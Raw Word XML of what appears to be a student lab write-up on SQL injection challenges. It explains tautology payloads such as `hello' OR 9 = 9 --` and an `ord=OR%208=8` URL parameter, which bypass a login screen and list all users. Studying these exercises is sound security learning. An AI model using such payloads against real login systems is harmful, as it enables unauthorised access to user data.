                            <w:r w:rsidR="00D178D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charachter</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00D178D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coming right after of it as a part of </w:t>
                            </w:r>
                            <w:r w:rsidR="001E02B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a string</w:t>
                            </w:r>
                            <w:r w:rsidR="00D178D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instead of as a part of the SQL commands &amp; syntax of the query. In this question, \  character is used as the escape character. </w:t>
                            </w:r>
                            <w:r w:rsidR="001F1F4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In this question, with the usage of \ character as the escape character, the  '  character </w:t>
                            </w:r>
                            <w:r w:rsidR="001F1F4E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(which comes right after of the \ character)</w:t>
                            </w:r>
                            <w:r w:rsidR="001F1F4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is treated as the part of the username payload instead of a part of SQL syntax of query.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As we can </w:t>
                            </w:r>
                            <w:r w:rsidR="00DA6ADC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observe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from the above screenshot</w:t>
                            </w:r>
                            <w:r w:rsidR="00DA6ADC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the  ' character I provided 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at the beginning of my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username payload input </w:t>
                            </w:r>
                            <w:r w:rsidR="00DA6ADC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is escaped</w:t>
                            </w:r>
                            <w:r w:rsidR="00100D02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, and </w:t>
                            </w:r>
                            <w:r w:rsidR="00DA6ADC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this  '  character is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replaced with</w:t>
                            </w:r>
                            <w:r w:rsidR="00DA6ADC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\' . </w:t>
                            </w:r>
                            <w:r w:rsidR="00A96C87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For the username </w:t>
                            </w:r>
                            <w:r w:rsidR="00F801E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payload </w:t>
                            </w:r>
                            <w:r w:rsidR="00A96C87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input I entered , the </w:t>
                            </w:r>
                            <w:r w:rsidR="00F801E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additionally </w:t>
                            </w:r>
                            <w:r w:rsidR="00A96C87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provided backslash character seems to be redundant. Because the hello string is already within single quotation marks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Moreover, for my username payload input, </w:t>
                            </w:r>
                            <w:r w:rsidR="00A96C87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there </w:t>
                            </w:r>
                            <w:r w:rsidR="00043ACA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are</w:t>
                            </w:r>
                            <w:r w:rsidR="00A96C87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no additional </w:t>
                            </w:r>
                            <w:r w:rsidR="00043ACA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special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character</w:t>
                            </w:r>
                            <w:r w:rsidR="00043ACA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s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043ACA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(such </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidR="00043ACA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as ;</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidR="00043ACA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' </w:t>
                            </w:r>
                            <w:r w:rsidR="00043ACA" w:rsidRPr="00C11C85">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:b/>
                                <w:bCs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" /)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to be escaped </w:t>
                            </w:r>
                            <w:r w:rsidR="00004B19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(escaping additional </w:t>
                            </w:r>
                            <w:r w:rsidR="00043ACA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special </w:t>
                            </w:r>
                            <w:r w:rsidR="00004B19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characters within the quotation marks of a string may bring more security)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within the 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starting and ending single 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quotation marks of hello</w:t>
                            </w:r>
                            <w:r w:rsidR="00043ACA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string</w:t>
                            </w:r>
                            <w:r w:rsidR="00C66AAD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.</w:t>
                            </w:r>
                            <w:r w:rsidR="00004B19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Other than those, in this challenge, the execution of the query for the username and password payloads I provided is same with the first question. At the beginning of my username payload input, I provided hello' to close the ' character which comes right after the “username=” part in the query. Then, I have </w:t>
                            </w:r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used a </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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operator called OR. After that, I have constructed a </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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statement such that the resulting </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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condition in “WHERE” part will </w:t>
                            </w:r>
                            <w:r w:rsidR="00E845E8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be a tautology</w:t>
                            </w:r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. I have written this </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart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="00642E2E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statement as 9 = 9, which is always true. </w:t>
                            </w:r>
                            <w:r w:rsidR="00CC5666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Next, I have written -- to my username payload to ignore </w:t>
                            </w:r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(comment)</w:t>
                            </w:r>
                            <w:r w:rsidR="00CC5666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everything </w:t>
                            </w:r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(including password payload I typed)</w:t>
                            </w:r>
                            <w:r w:rsidR="00CC5666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coming after these two dashes. Therefore, for the username payload input I have written in this question, any arbitrary password payload string can be provided. I have typed </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/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fbfbfb</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/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CC5666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as the password payload input in this challenge </w:t>
                            </w:r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(</w:t>
                            </w:r>
                            <w:r w:rsidR="00471F0F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As</w:t>
                            </w:r>
                            <w:r w:rsidR="00CC5666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 xml:space="preserve"> I did in the first challenge)</w:t>
                            </w:r>
                            <w:r w:rsidR="00CC5666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.</w:t>
                            </w:r>
                            <w:r w:rsidR="00471F0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Since I constructed a tautology with the usage of </w:t>
                            </w:r>
                            <w:r w:rsidR="00471F0F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9 = 9</w:t>
                            </w:r>
                            <w:r w:rsidR="00471F0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right after </w:t>
                            </w:r>
                            <w:r w:rsidR="00471F0F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OR</w:t>
                            </w:r>
                            <w:r w:rsidR="00471F0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logical operator</w:t>
                            </w:r>
                            <w:r w:rsidR="002006E5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2006E5" w:rsidRPr="00C11C85">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:b/>
                                <w:bCs/>
                                <w:sz w:val="21"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                              <w:t>(regardless of the evaluation of username)</w:t>
                            </w:r>
                            <w:r w:rsidR="00471F0F" w:rsidRPr="00C11C85">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:sz w:val="21"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                              <w:t>, my username payload and password payload are successful for this question. Therefore, I could bypass the login screen, and list all users.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="462530E8" w14:textId="77777777" w:rsidR="00231739" w:rsidRPr="00DA6ADC" w:rsidRDefault="00231739" w:rsidP="00231739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</w:p>
                          <w:p w14:paraId="1BD205F5" w14:textId="639E445C" w:rsidR="00231739" w:rsidRPr="00730380" w:rsidRDefault="00231739" w:rsidP="00231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5E941B" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Metin Kutusu 11" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:-71.5pt;margin-top:307.05pt;width:595.15pt;height:391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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7C480310" w14:textId="25F9D509" w:rsidR="00231739" w:rsidRPr="006921C6" w:rsidRDefault="00231739" w:rsidP="00231739">
                      <w:pPr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>Payload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>s</w:t>
                      </w:r>
                      <w:r w:rsidRPr="004661A5"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 xml:space="preserve"> that I have entered: </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/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</w:p>
                    <w:p w14:paraId="71AA87BA" w14:textId="19E282A4" w:rsidR="00231739" w:rsidRPr="004661A5" w:rsidRDefault="00231739" w:rsidP="00231739">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22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For Username:         </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00DF55BC">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>hello</w:t>
                      </w:r>
                      <w:r w:rsidRPr="004661A5">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve">' OR </w:t>
                      </w:r>
                      <w:r w:rsidR="00AE5E3F">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>9</w:t>
                      </w:r>
                      <w:r w:rsidRPr="004661A5">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> = </w:t>
                      </w:r>
                      <w:r w:rsidR="00AE5E3F">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>9</w:t>
                      </w:r>
                      <w:r w:rsidRPr="004661A5">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> --</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3625E1C8" w14:textId="77777777" w:rsidR="00231739" w:rsidRPr="004661A5" w:rsidRDefault="00231739" w:rsidP="00231739">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004661A5">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve">For Password:          </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="004661A5">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>fbfbfb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  <w:p w14:paraId="66538F32" w14:textId="77777777" w:rsidR="00231739" w:rsidRPr="004661A5" w:rsidRDefault="00231739" w:rsidP="00231739">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="12611E7C" w14:textId="7423F264" w:rsidR="00231739" w:rsidRPr="00C11C85" w:rsidRDefault="00231739" w:rsidP="00C11C85">
                      <w:pPr>
                        <w:spacing w:line="276" w:lineRule="auto"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r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Explanation about the username and password payloads I have entered/written:</w:t>
                      </w:r>
                      <w:r w:rsidR="00340D85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 </w:t>
                      </w:r>
                      <w:r w:rsidR="00886DA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For bypassing the login screen and proceeding to the next challenge, I have used username payload and password payload which are almost same with the ones I used in the previous question (Challenge1 of the Question2). </w:t>
                      </w:r>
                      <w:r w:rsidR="002006E5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In this challenge, </w:t>
                      </w:r>
                      <w:r w:rsidR="00886DAF" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>I have</w:t>
                      </w:r>
                      <w:r w:rsidR="002006E5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only</w:t>
                      </w:r>
                      <w:r w:rsidR="00886DA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changed the condition “ 5 = 5 ” to the condition “ 9 = 9 ”. 9 = 9 will also always be evaluated as true. </w:t>
                      </w:r>
                      <w:r w:rsidR="007F0463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Therefore, this change does not change the evaluation of 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the outcome </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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condition in the </w:t>
                      </w:r>
                      <w:r w:rsidR="00004B19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WHERE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part of the query.</w:t>
                      </w:r>
                      <w:r w:rsidR="00471F0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D178D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In the syntax of SQL, the escape character is used to treat the </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00D178DF" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>charachter</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00D178D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coming right after of it as a part of </w:t>
                      </w:r>
                      <w:r w:rsidR="001E02B9" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>a string</w:t>
                      </w:r>
                      <w:r w:rsidR="00D178D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instead of as a part of the SQL commands &amp; syntax of the query. In this question, \  character is used as the escape character. </w:t>
                      </w:r>
                      <w:r w:rsidR="001F1F4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In this question, with the usage of \ character as the escape character, the  '  character </w:t>
                      </w:r>
                      <w:r w:rsidR="001F1F4E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(which comes right after of the \ character)</w:t>
                      </w:r>
                      <w:r w:rsidR="001F1F4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is treated as the part of the username payload instead of a part of SQL syntax of query.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As we can </w:t>
                      </w:r>
                      <w:r w:rsidR="00DA6ADC" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>observe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from the above screenshot</w:t>
                      </w:r>
                      <w:r w:rsidR="00DA6ADC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,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the  ' character I provided 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>at the beginning of my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username payload input </w:t>
                      </w:r>
                      <w:r w:rsidR="00DA6ADC" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>is escaped</w:t>
                      </w:r>
                      <w:r w:rsidR="00100D02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, and </w:t>
                      </w:r>
                      <w:r w:rsidR="00DA6ADC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this  '  character is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>replaced with</w:t>
                      </w:r>
                      <w:r w:rsidR="00DA6ADC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\' . </w:t>
                      </w:r>
                      <w:r w:rsidR="00A96C87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For the username </w:t>
                      </w:r>
                      <w:r w:rsidR="00F801E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payload </w:t>
                      </w:r>
                      <w:r w:rsidR="00A96C87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input I entered , the </w:t>
                      </w:r>
                      <w:r w:rsidR="00F801E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additionally </w:t>
                      </w:r>
                      <w:r w:rsidR="00A96C87" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>provided backslash character seems to be redundant. Because the hello string is already within single quotation marks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. Moreover, for my username payload input, </w:t>
                      </w:r>
                      <w:r w:rsidR="00A96C87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there </w:t>
                      </w:r>
                      <w:r w:rsidR="00043ACA" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>are</w:t>
                      </w:r>
                      <w:r w:rsidR="00A96C87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no additional </w:t>
                      </w:r>
                      <w:r w:rsidR="00043ACA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special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>character</w:t>
                      </w:r>
                      <w:r w:rsidR="00043ACA" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>s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043ACA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(such </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidR="00043ACA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as ;</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="00043ACA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 ' </w:t>
                      </w:r>
                      <w:r w:rsidR="00043ACA" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi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</w:rPr>
                        <w:t xml:space="preserve">" /)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to be escaped </w:t>
                      </w:r>
                      <w:r w:rsidR="00004B19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(escaping additional </w:t>
                      </w:r>
                      <w:r w:rsidR="00043ACA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special </w:t>
                      </w:r>
                      <w:r w:rsidR="00004B19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characters within the quotation marks of a string may bring more security)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within the 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starting and ending single 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>quotation marks of hello</w:t>
                      </w:r>
                      <w:r w:rsidR="00043ACA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string</w:t>
                      </w:r>
                      <w:r w:rsidR="00C66AAD" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r w:rsidR="00004B19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Other than those, in this challenge, the execution of the query for the username and password payloads I provided is same with the first question. At the beginning of my username payload input, I provided hello' to close the ' character which comes right after the “username=” part in the query. Then, I have </w:t>
                      </w:r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used a </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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operator called OR. After that, I have constructed a </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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statement such that the resulting </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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condition in “WHERE” part will </w:t>
                      </w:r>
                      <w:r w:rsidR="00E845E8" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>be a tautology</w:t>
                      </w:r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. I have written this </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart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="00642E2E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statement as 9 = 9, which is always true. </w:t>
                      </w:r>
                      <w:r w:rsidR="00CC5666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Next, I have written -- to my username payload to ignore </w:t>
                      </w:r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(comment)</w:t>
                      </w:r>
                      <w:r w:rsidR="00CC5666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everything </w:t>
                      </w:r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(including password payload I typed)</w:t>
                      </w:r>
                      <w:r w:rsidR="00CC5666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coming after these two dashes. Therefore, for the username payload input I have written in this question, any arbitrary password payload string can be provided. I have typed </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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fbfbfb</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/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 </w:t>
                      </w:r>
                      <w:r w:rsidR="00CC5666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as the password payload input in this challenge </w:t>
                      </w:r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(</w:t>
                      </w:r>
                      <w:r w:rsidR="00471F0F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As</w:t>
                      </w:r>
                      <w:r w:rsidR="00CC5666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 xml:space="preserve"> I did in the first challenge)</w:t>
                      </w:r>
                      <w:r w:rsidR="00CC5666" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>.</w:t>
                      </w:r>
                      <w:r w:rsidR="00471F0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Since I constructed a tautology with the usage of </w:t>
                      </w:r>
                      <w:r w:rsidR="00471F0F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9 = 9</w:t>
                      </w:r>
                      <w:r w:rsidR="00471F0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right after </w:t>
                      </w:r>
                      <w:r w:rsidR="00471F0F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OR</w:t>
                      </w:r>
                      <w:r w:rsidR="00471F0F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logical operator</w:t>
                      </w:r>
                      <w:r w:rsidR="002006E5" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="002006E5" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>(regardless of the evaluation of username)</w:t>
                      </w:r>
                      <w:r w:rsidR="00471F0F" w:rsidRPr="00C11C85">
                        <w:rPr>
                          <w:rFonts w:cstheme="minorHAnsi"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>, my username payload and password payload are successful for this question. Therefore, I could bypass the login screen, and list all users.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="462530E8" w14:textId="77777777" w:rsidR="00231739" w:rsidRPr="00DA6ADC" w:rsidRDefault="00231739" w:rsidP="00231739">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="1BD205F5" w14:textId="639E445C" w:rsidR="00231739" w:rsidRPr="00730380" w:rsidRDefault="00231739" w:rsidP="0023173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CDCD83" wp14:editId="0C3E43F7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-824294</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3656330</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7080250" cy="167780"/>
                <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1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0" cy="167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936D0E" w14:textId="00539A7F" w:rsidR="00C12394" w:rsidRPr="00100D02" w:rsidRDefault="00C12394" w:rsidP="00C12394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100D02">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>Screenshot which shows the successful login message after I enter correct payloads in the second challenge of question2</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6A4CAD93" w14:textId="1EEAD8FF" w:rsidR="00C12394" w:rsidRPr="006821F2" w:rsidRDefault="00C12394" w:rsidP="00C12394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DCD83" id="Metin Kutusu 1" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:-64.9pt;margin-top:287.9pt;width:557.5pt;height:13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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="32936D0E" w14:textId="00539A7F" w:rsidR="00C12394" w:rsidRPr="00100D02" w:rsidRDefault="00C12394" w:rsidP="00C12394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 w:rsidRPr="00100D02">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>Screenshot which shows the successful login message after I enter correct payloads in the second challenge of question2</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6A4CAD93" w14:textId="1EEAD8FF" w:rsidR="00C12394" w:rsidRPr="006821F2" w:rsidRDefault="00C12394" w:rsidP="00C12394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45E8">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A095798" w14:textId="5D79796A" w:rsidR="0097619A" w:rsidRDefault="001F1F4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1F4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Third Challenge (Third Part)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42DB67" w14:textId="08B917CB" w:rsidR="001F1F4E" w:rsidRDefault="00DA6ADC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5D4AA14" wp14:editId="0D7F77A0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-723627</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>173023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6887361" cy="4304601"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapNone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735" cy="430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E2770F" w14:textId="77777777" w:rsidR="007A3420" w:rsidRDefault="007A3420"/>
    <w:p w14:paraId="43090E2E" w14:textId="7E1B9357" w:rsidR="007A3420" w:rsidRDefault="007A342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8EA2D1" wp14:editId="1072FA52">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-790738</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4389166</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7306811" cy="4806891"/>
                <wp:effectExtent l="0" t="0" r="8890" b="6985"/>
                <wp:wrapNone/>
                <wp:docPr id="16" name="Metin Kutusu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811" cy="4806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6696C" w14:textId="6B5FE924" w:rsidR="00100D02" w:rsidRDefault="00100D0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100D02">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>Payloads that I have entered:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="59800974" w14:textId="1FF79F41" w:rsidR="00100D02" w:rsidRDefault="00100D0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79A53A9B" w14:textId="01810920" w:rsidR="00100D02" w:rsidRDefault="00100D02">
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">For username: </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>abc</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="4E47B663" w14:textId="78A7D501" w:rsidR="00100D02" w:rsidRDefault="00100D02">
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">For password: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00100D02">
                              <w:t>123</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="59A37103" w14:textId="29A300D9" w:rsidR="00100D02" w:rsidRDefault="00100D02">
                            <w:r w:rsidRPr="00100D02">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">For </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00100D02">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>ord</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00100D02">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve"> parameter: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00100D02">
                              <w:t>OR%208=8</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D64414C" w14:textId="4BBBD9BB" w:rsidR="00240F6E" w:rsidRPr="00240F6E" w:rsidRDefault="00240F6E">
                            <w:r w:rsidRPr="00240F6E">
                              <w:rPr>
                                <w:b/>
                                <w:bCs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</w:rPr>
                              <w:t>entire</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00240F6E">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve"> payload I entered to the URL: </w:t>
                            </w:r>
                            <w:r>
                              <w:t>&amp;username=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>abc&amp;password</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>=123&amp;ord=OR%208=8</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="082AAD06" w14:textId="2886BA79" w:rsidR="00100D02" w:rsidRDefault="00100D02"/>
                          <w:p w14:paraId="702A3E2B" w14:textId="569342A6" w:rsidR="00100D02" w:rsidRDefault="00100D02" w:rsidP="006921C6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100D02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Explanation about the username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Pr="00100D02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password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, and </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r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>ord</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r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parameter</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00100D02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payloads I have entered/written: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240F6E">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>I</w:t>
                            </w:r>
                            <w:r w:rsidR="00240F6E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n this question, the “ORDER BY” command at the end of the query caused (introduced) this vulnerability of the system. </w:t>
                            </w:r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Since the </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/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ord</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/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parameter (which is the parameter of </w:t>
                            </w:r>
                            <w:r w:rsidR="00D80D13" w:rsidRPr="00A64825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ORDER BY</w:t>
                            </w:r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part) can be manually set/assigned by the user of the system within the payload part of the URL; the login screen can be bypassed</w:t>
                            </w:r>
                            <w:r w:rsidR="00FA1E79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>, and the</w:t>
                            </w:r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vulnerability of the system can be exploited. I have entered</w:t>
                            </w:r>
                            <w:r w:rsidR="00B53F66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="00B53F66" w:rsidRPr="00B53F66">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="000000" w:themeColor="text1"/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>abc</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00D80D13" w:rsidRPr="00A64825">
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi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as the username payload string input and </w:t>
                            </w:r>
                            <w:r w:rsidR="00B53F66" w:rsidRPr="00B53F6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123</w:t>
                            </w:r>
                            <w:r w:rsidR="00D80D13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as the password payload string input. </w:t>
                            </w:r>
                            <w:r w:rsidR="00847D6E" w:rsidRP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However, as inputs, any arbitrary username and password payload strings can be provided by the users of this system. </w:t>
                            </w:r>
                            <w:r w:rsidR="00D80D13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Because, for </w:t>
                            </w:r>
                            <w:r w:rsidR="00A64825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all</w:t>
                            </w:r>
                            <w:r w:rsidR="00D80D13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the password inputs and username inputs provided, </w:t>
                            </w:r>
                            <w:r w:rsidR="00A64825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since they are directly entered to the </w:t>
                            </w:r>
                            <w:r w:rsid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payload part of </w:t>
                            </w:r>
                            <w:r w:rsidR="00A64825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URL</w:t>
                            </w:r>
                            <w:r w:rsid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A64825" w:rsidRPr="00A64825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(not to the corresponding text boxes</w:t>
                            </w:r>
                            <w:r w:rsidR="00A64825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which can take inputs</w:t>
                            </w:r>
                            <w:r w:rsidR="00A64825" w:rsidRPr="00A64825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)</w:t>
                            </w:r>
                            <w:r w:rsidR="00A64825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, </w:t>
                            </w:r>
                            <w:r w:rsidR="00D80D13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the system treats them as </w:t>
                            </w:r>
                            <w:r w:rsidR="00A64825" w:rsidRP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?</w:t>
                            </w:r>
                            <w:r w:rsidR="00A64825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. </w:t>
                            </w:r>
                            <w:r w:rsid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I have entered </w:t>
                            </w:r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OR 8=8 tautology </w:t>
